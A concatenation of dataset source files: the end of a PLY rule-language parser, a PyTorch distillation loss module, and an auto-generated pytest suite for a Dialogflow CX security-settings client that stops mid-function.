for c in r.get('clauses', []):
if 'action' in c:
action = c['action']
if action not in reserved_actions:
if action not in numeric:
raise ParseError(message='Label not found: %s' % action, lineno=c.get('lineno'), lexpos=c.get('lexpos'))
c['action'] = 'restart-from-next(%d)' % numeric[action]
else:
if r['n'] >= 1:
raise ParseError(message='Consider adding repeat here', lineno=c.get('lineno'), lexpos=c.get('lexpos'))
else:
c['action'] = 'repeat'
import ply.yacc as yacc
parser = yacc.yacc()
lexer = lex.lex()
lexer = IndentLexer(lexer)
import sys
import json
EXPR_TYPE_CONST = 'const'
EXPR_TYPE_IN_VAR = 'in_var'
EXPR_TYPE_TIMESTAMP_OP_VAR = 'timestamp_op_var'
EXPR_TYPE_TIMESTAMP_OP_CONST = 'timestamp_op_const'
def is_variable(n):
if n == '':
return False
return n[0] in '#&%$@'
def parse_expr(expr_string):
m = re.match('((>=)|(<=)|(==)|(<)|(>))(.+)', expr_string)
if m:
if is_variable(m.group(7)):
return (EXPR_TYPE_TIMESTAMP_OP_VAR, (m.group(1), m.group(7)))
else:
return (EXPR_TYPE_TIMESTAMP_OP_CONST, (m.group(1), m.group(7)))
if is_variable(expr_string):
return (EXPR_TYPE_IN_VAR, (expr_string,))
else:
return (EXPR_TYPE_CONST, (expr_string,))
def get_var_fields(rules):
res = {}
for rule in rules:
for clause in rule.get('clauses', []):
for field, conditions in clause.get('attrs', {}).items():
for expr in conditions:
t, r = parse_expr(expr)
if t == EXPR_TYPE_IN_VAR:
res[r[0]] = field
elif t == EXPR_TYPE_TIMESTAMP_OP_VAR:
res[r[1]] = field
return res
def compile_tr(text):
lexer.input(text)
result = parser.parse(lexer = lexer)
assign_numeric_labels(result['rules'])
flat_rules = list(flatten_rules(result['rules']))
convert_transitions(flat_rules)
if 'groupby' in result:
return { 'rules' : flat_rules, 'groupby': result['groupby']}
else:
return {'rules' : flat_rules}
def syntax_check(text):
try:
parser = yacc.yacc()
lexer = lex.lex()
lexer = IndentLexer(lexer)
sys.stderr.write("text %s\n" % text)
lexer.input(text)
result = parser.parse(lexer=lexer)
assign_numeric_labels(result['rules'])
flat_rules = list(flatten_rules(result['rules']))
convert_transitions(flat_rules)
return []
except ParseError as e:
sys.stderr.write("exception %s %s\n" % (e.message, lexer.lexer.lineno))
return [{'message' : e.message, 'info' : e.info}]
if __name__ == '__main__':
if len(sys.argv) == 1:
flat_rules = compile_tr(sys.stdin.read())
print(json.dumps(flat_rules))
elif sys.argv[1] == 'lex':
lexer.input(sys.stdin.read())
for t in lexer:
print(t.lineno, t.type, t.value)
elif sys.argv[1] == 'gen':
pass
| true | true |
1c3c7c14e4175d4c1eea50ac615d458cd27cbcdb | 1,011 | py | Python | loss/distill.py | SinterCVer/pytorch-keypoints-det | 9ec271d37a98740998d4b146634747520a0b9f43 | [
"MIT"
] | 1 | 2021-09-20T07:03:18.000Z | 2021-09-20T07:03:18.000Z | loss/distill.py | sinterwong/pytorch-keypoints-det | 9ec271d37a98740998d4b146634747520a0b9f43 | [
"MIT"
] | null | null | null | loss/distill.py | sinterwong/pytorch-keypoints-det | 9ec271d37a98740998d4b146634747520a0b9f43 | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
class KLDivLoss():
def __init__(self, alpha, T):
super(KLDivLoss).__init__()
self.alpha = alpha
self.T = T
self.KDLoss = nn.KLDivLoss()
def __call__(self, outputs, t_outputs, labels):
return self.KDLoss(F.log_softmax(outputs / self.T, dim=1), F.softmax(t_outputs / self.T, dim=1)) * \
(self.alpha * self.T * self.T) + \
F.cross_entropy(outputs, labels) * (1. - self.alpha)
class DistillFeatureMSELoss():
def __init__(self, reduction="mean", num_df=3, alpha=10.):
super(DistillFeatureMSELoss).__init__()
self.criterion = [nn.MSELoss(reduction=reduction)] * num_df
self.alpha = alpha
def __call__(self, s_out, t_out):
fs_loss = [loss_fn(s_out[i], t_out[i]) for i, loss_fn in enumerate(self.criterion)]
return torch.sum(torch.cuda.FloatTensor(fs_loss) if s_out[0].is_cuda else torch.Tensor(fs_loss)) * self.alpha
| 36.107143 | 117 | 0.642928 | import torch
import torch.nn as nn
import torch.nn.functional as F
class KLDivLoss():
def __init__(self, alpha, T):
super(KLDivLoss).__init__()
self.alpha = alpha
self.T = T
self.KDLoss = nn.KLDivLoss()
def __call__(self, outputs, t_outputs, labels):
return self.KDLoss(F.log_softmax(outputs / self.T, dim=1), F.softmax(t_outputs / self.T, dim=1)) * \
(self.alpha * self.T * self.T) + \
F.cross_entropy(outputs, labels) * (1. - self.alpha)
class DistillFeatureMSELoss():
def __init__(self, reduction="mean", num_df=3, alpha=10.):
super(DistillFeatureMSELoss).__init__()
self.criterion = [nn.MSELoss(reduction=reduction)] * num_df
self.alpha = alpha
def __call__(self, s_out, t_out):
fs_loss = [loss_fn(s_out[i], t_out[i]) for i, loss_fn in enumerate(self.criterion)]
return torch.sum(torch.cuda.FloatTensor(fs_loss) if s_out[0].is_cuda else torch.Tensor(fs_loss)) * self.alpha
| true | true |
1c3c7c6ddb41c8e4400d1cc180167d9c5a39ff0d | 103,009 | py | Python | google/cloud/dialogflow/cx/v3beta1/dialogflow-cx-v3beta1-py/tests/unit/gapic/dialogflowcx_v3beta1/test_security_settings_service.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 7 | 2021-02-21T10:39:41.000Z | 2021-12-07T07:31:28.000Z | google/cloud/dialogflow/cx/v3beta1/dialogflow-cx-v3beta1-py/tests/unit/gapic/dialogflowcx_v3beta1/test_security_settings_service.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 6 | 2021-02-02T23:46:11.000Z | 2021-11-15T01:46:02.000Z | google/cloud/dialogflow/cx/v3beta1/dialogflow-cx-v3beta1-py/tests/unit/gapic/dialogflowcx_v3beta1/test_security_settings_service.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 4 | 2021-01-28T23:25:45.000Z | 2021-08-30T01:55:16.000Z | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import packaging.version
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import path_template
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.dialogflowcx_v3beta1.services.security_settings_service import SecuritySettingsServiceAsyncClient
from google.cloud.dialogflowcx_v3beta1.services.security_settings_service import SecuritySettingsServiceClient
from google.cloud.dialogflowcx_v3beta1.services.security_settings_service import pagers
from google.cloud.dialogflowcx_v3beta1.services.security_settings_service import transports
from google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.base import _GOOGLE_AUTH_VERSION
from google.cloud.dialogflowcx_v3beta1.types import security_settings
from google.cloud.dialogflowcx_v3beta1.types import security_settings as gcdc_security_settings
from google.oauth2 import service_account
from google.protobuf import field_mask_pb2 # type: ignore
import google.auth
# TODO(busunkim): Once google-auth >= 1.25.0 is required transitively
# through google-api-core:
# - Delete the auth "less than" test cases
# - Delete these pytest markers (Make the "greater than or equal to" tests the default).
requires_google_auth_lt_1_25_0 = pytest.mark.skipif(
packaging.version.parse(_GOOGLE_AUTH_VERSION) >= packaging.version.parse("1.25.0"),
reason="This test requires google-auth < 1.25.0",
)
requires_google_auth_gte_1_25_0 = pytest.mark.skipif(
packaging.version.parse(_GOOGLE_AUTH_VERSION) < packaging.version.parse("1.25.0"),
reason="This test requires google-auth >= 1.25.0",
)
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return "foo.googleapis.com" if ("localhost" in client.DEFAULT_ENDPOINT) else client.DEFAULT_ENDPOINT
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert SecuritySettingsServiceClient._get_default_mtls_endpoint(None) is None
assert SecuritySettingsServiceClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
assert SecuritySettingsServiceClient._get_default_mtls_endpoint(api_mtls_endpoint) == api_mtls_endpoint
assert SecuritySettingsServiceClient._get_default_mtls_endpoint(sandbox_endpoint) == sandbox_mtls_endpoint
assert SecuritySettingsServiceClient._get_default_mtls_endpoint(sandbox_mtls_endpoint) == sandbox_mtls_endpoint
assert SecuritySettingsServiceClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
@pytest.mark.parametrize("client_class", [
SecuritySettingsServiceClient,
SecuritySettingsServiceAsyncClient,
])
def test_security_settings_service_client_from_service_account_info(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_info') as factory:
factory.return_value = creds
info = {"valid": True}
client = client_class.from_service_account_info(info)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == 'dialogflow.googleapis.com:443'
@pytest.mark.parametrize("transport_class,transport_name", [
(transports.SecuritySettingsServiceGrpcTransport, "grpc"),
(transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_security_settings_service_client_service_account_always_use_jwt(transport_class, transport_name):
with mock.patch.object(service_account.Credentials, 'with_always_use_jwt_access', create=True) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=True)
use_jwt.assert_called_once_with(True)
with mock.patch.object(service_account.Credentials, 'with_always_use_jwt_access', create=True) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=False)
use_jwt.assert_not_called()
@pytest.mark.parametrize("client_class", [
SecuritySettingsServiceClient,
SecuritySettingsServiceAsyncClient,
])
def test_security_settings_service_client_from_service_account_file(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_file') as factory:
factory.return_value = creds
client = client_class.from_service_account_file("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
client = client_class.from_service_account_json("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == 'dialogflow.googleapis.com:443'
def test_security_settings_service_client_get_transport_class():
transport = SecuritySettingsServiceClient.get_transport_class()
available_transports = [
transports.SecuritySettingsServiceGrpcTransport,
]
assert transport in available_transports
transport = SecuritySettingsServiceClient.get_transport_class("grpc")
assert transport == transports.SecuritySettingsServiceGrpcTransport
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(SecuritySettingsServiceClient, transports.SecuritySettingsServiceGrpcTransport, "grpc"),
(SecuritySettingsServiceAsyncClient, transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
@mock.patch.object(SecuritySettingsServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(SecuritySettingsServiceClient))
@mock.patch.object(SecuritySettingsServiceAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(SecuritySettingsServiceAsyncClient))
def test_security_settings_service_client_client_options(client_class, transport_class, transport_name):
# Check that if channel is provided we won't create a new one.
with mock.patch.object(SecuritySettingsServiceClient, 'get_transport_class') as gtc:
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials()
)
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(SecuritySettingsServiceClient, 'get_transport_class') as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = client_class()
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}):
with pytest.raises(ValueError):
client = client_class()
# Check the case quota_project_id is provided
options = client_options.ClientOptions(quota_project_id="octopus")
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id="octopus",
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize("client_class,transport_class,transport_name,use_client_cert_env", [
(SecuritySettingsServiceClient, transports.SecuritySettingsServiceGrpcTransport, "grpc", "true"),
(SecuritySettingsServiceAsyncClient, transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio", "true"),
(SecuritySettingsServiceClient, transports.SecuritySettingsServiceGrpcTransport, "grpc", "false"),
(SecuritySettingsServiceAsyncClient, transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio", "false"),
])
@mock.patch.object(SecuritySettingsServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(SecuritySettingsServiceClient))
@mock.patch.object(SecuritySettingsServiceAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(SecuritySettingsServiceAsyncClient))
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_security_settings_service_client_mtls_env_auto(client_class, transport_class, transport_name, use_client_cert_env):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
options = client_options.ClientOptions(client_cert_source=client_cert_source_callback)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
if use_client_cert_env == "false":
expected_client_cert_source = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_client_cert_source = client_cert_source_callback
expected_host = client.DEFAULT_MTLS_ENDPOINT
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch.object(transport_class, '__init__') as patched:
with mock.patch('google.auth.transport.mtls.has_default_client_cert_source', return_value=True):
with mock.patch('google.auth.transport.mtls.default_client_cert_source', return_value=client_cert_source_callback):
if use_client_cert_env == "false":
expected_host = client.DEFAULT_ENDPOINT
expected_client_cert_source = None
else:
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_client_cert_source = client_cert_source_callback
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch.object(transport_class, '__init__') as patched:
with mock.patch("google.auth.transport.mtls.has_default_client_cert_source", return_value=False):
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(SecuritySettingsServiceClient, transports.SecuritySettingsServiceGrpcTransport, "grpc"),
(SecuritySettingsServiceAsyncClient, transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_security_settings_service_client_client_options_scopes(client_class, transport_class, transport_name):
# Check the case scopes are provided.
options = client_options.ClientOptions(
scopes=["1", "2"],
)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=["1", "2"],
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(SecuritySettingsServiceClient, transports.SecuritySettingsServiceGrpcTransport, "grpc"),
(SecuritySettingsServiceAsyncClient, transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_security_settings_service_client_client_options_credentials_file(client_class, transport_class, transport_name):
# Check the case credentials file is provided.
options = client_options.ClientOptions(
credentials_file="credentials.json"
)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
def test_security_settings_service_client_client_options_from_dict():
with mock.patch('google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.SecuritySettingsServiceGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = SecuritySettingsServiceClient(
client_options={'api_endpoint': 'squid.clam.whelk'}
)
grpc_transport.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
def test_create_security_settings(transport: str = 'grpc', request_type=gcdc_security_settings.CreateSecuritySettingsRequest):
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = gcdc_security_settings.SecuritySettings(
name='name_value',
display_name='display_name_value',
redaction_strategy=gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
redaction_scope=gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
inspect_template='inspect_template_value',
deidentify_template='deidentify_template_value',
purge_data_types=[gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
retention_window_days=2271,
)
response = client.create_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == gcdc_security_settings.CreateSecuritySettingsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gcdc_security_settings.SecuritySettings)
assert response.name == 'name_value'
assert response.display_name == 'display_name_value'
assert response.redaction_strategy == gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
assert response.redaction_scope == gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
assert response.inspect_template == 'inspect_template_value'
assert response.deidentify_template == 'deidentify_template_value'
assert response.purge_data_types == [gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
def test_create_security_settings_from_dict():
test_create_security_settings(request_type=dict)
def test_create_security_settings_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_security_settings),
'__call__') as call:
client.create_security_settings()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == gcdc_security_settings.CreateSecuritySettingsRequest()
@pytest.mark.asyncio
async def test_create_security_settings_async(transport: str = 'grpc_asyncio', request_type=gcdc_security_settings.CreateSecuritySettingsRequest):
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings(
name='name_value',
display_name='display_name_value',
redaction_strategy=gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
redaction_scope=gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
inspect_template='inspect_template_value',
deidentify_template='deidentify_template_value',
purge_data_types=[gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
))
response = await client.create_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == gcdc_security_settings.CreateSecuritySettingsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gcdc_security_settings.SecuritySettings)
assert response.name == 'name_value'
assert response.display_name == 'display_name_value'
assert response.redaction_strategy == gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
assert response.redaction_scope == gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
assert response.inspect_template == 'inspect_template_value'
assert response.deidentify_template == 'deidentify_template_value'
assert response.purge_data_types == [gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
@pytest.mark.asyncio
async def test_create_security_settings_async_from_dict():
await test_create_security_settings_async(request_type=dict)
def test_create_security_settings_field_headers():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = gcdc_security_settings.CreateSecuritySettingsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_security_settings),
'__call__') as call:
call.return_value = gcdc_security_settings.SecuritySettings()
client.create_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_create_security_settings_field_headers_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = gcdc_security_settings.CreateSecuritySettingsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_security_settings),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings())
await client.create_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
def test_create_security_settings_flattened():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = gcdc_security_settings.SecuritySettings()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_security_settings(
parent='parent_value',
security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
assert args[0].security_settings == gcdc_security_settings.SecuritySettings(name='name_value')
def test_create_security_settings_flattened_error():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_security_settings(
gcdc_security_settings.CreateSecuritySettingsRequest(),
parent='parent_value',
security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
)
@pytest.mark.asyncio
async def test_create_security_settings_flattened_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = gcdc_security_settings.SecuritySettings()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_security_settings(
parent='parent_value',
security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
assert args[0].security_settings == gcdc_security_settings.SecuritySettings(name='name_value')
@pytest.mark.asyncio
async def test_create_security_settings_flattened_error_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_security_settings(
gcdc_security_settings.CreateSecuritySettingsRequest(),
parent='parent_value',
security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
)
def test_get_security_settings(transport: str = 'grpc', request_type=security_settings.GetSecuritySettingsRequest):
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = security_settings.SecuritySettings(
name='name_value',
display_name='display_name_value',
redaction_strategy=security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
redaction_scope=security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
inspect_template='inspect_template_value',
deidentify_template='deidentify_template_value',
purge_data_types=[security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
retention_window_days=2271,
)
response = client.get_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == security_settings.GetSecuritySettingsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, security_settings.SecuritySettings)
assert response.name == 'name_value'
assert response.display_name == 'display_name_value'
assert response.redaction_strategy == security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
assert response.redaction_scope == security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
assert response.inspect_template == 'inspect_template_value'
assert response.deidentify_template == 'deidentify_template_value'
assert response.purge_data_types == [security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
def test_get_security_settings_from_dict():
test_get_security_settings(request_type=dict)
def test_get_security_settings_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = SecuritySettingsServiceClient(
